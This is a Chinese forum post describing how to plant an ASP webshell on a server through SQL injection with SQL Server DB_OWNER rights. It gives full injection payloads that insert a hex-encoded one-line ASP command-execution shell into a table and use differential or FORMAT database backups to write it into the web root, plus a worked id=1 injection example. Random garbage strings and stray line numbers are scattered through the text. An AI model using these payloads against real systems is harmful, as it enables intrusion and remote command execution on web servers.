DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
7 d8 X. o; I- C, s  E
减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL
; ]2 r1 X0 m7 T$ z3 T3 v9 P
! O6 {* t3 G/ r+ s1
: v9 h9 @- ?+ J% u0 N2
; M& `" E) o+ z$ @2 _3
4
) `. V$ d  m2 Q+ y5 u3 }1 G declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
4 z; h  \( k, {. B6 d5 U$ ]4 k( ^declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
. @( K+ M) C! r$ p$ \# T" T7 m: w
4 t4 a( u* p# E# l0 R. a  i二利用完全FORMAT
8 o6 D" w& ?6 c; q" g; a+ p) \加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
) w2 ^# F! Q0 o$ q6 b
1
2
, G1 k# B4 N+ d; U  c4 V; {/ v, w3
- K# q4 C6 L. `0 p" @% n4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
+ T, Z1 m2 X3 m  icreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
# K/ a3 Z; M# R5 }6 Udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
! C% A& {. ]5 Z! `# i
总的来说就是那么简单几句,下面以备份数据库model为例子
1

7 k$ @" d% G8 e1
$ i* x$ \' c8 Y8 _% V# ^: o id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

9 L; f' P$ B( c; A2

1
6 M, G. B. {) o& q, j1 K2 G9 t id=1;backup database model to disk='你的路径‘ with differential,format;--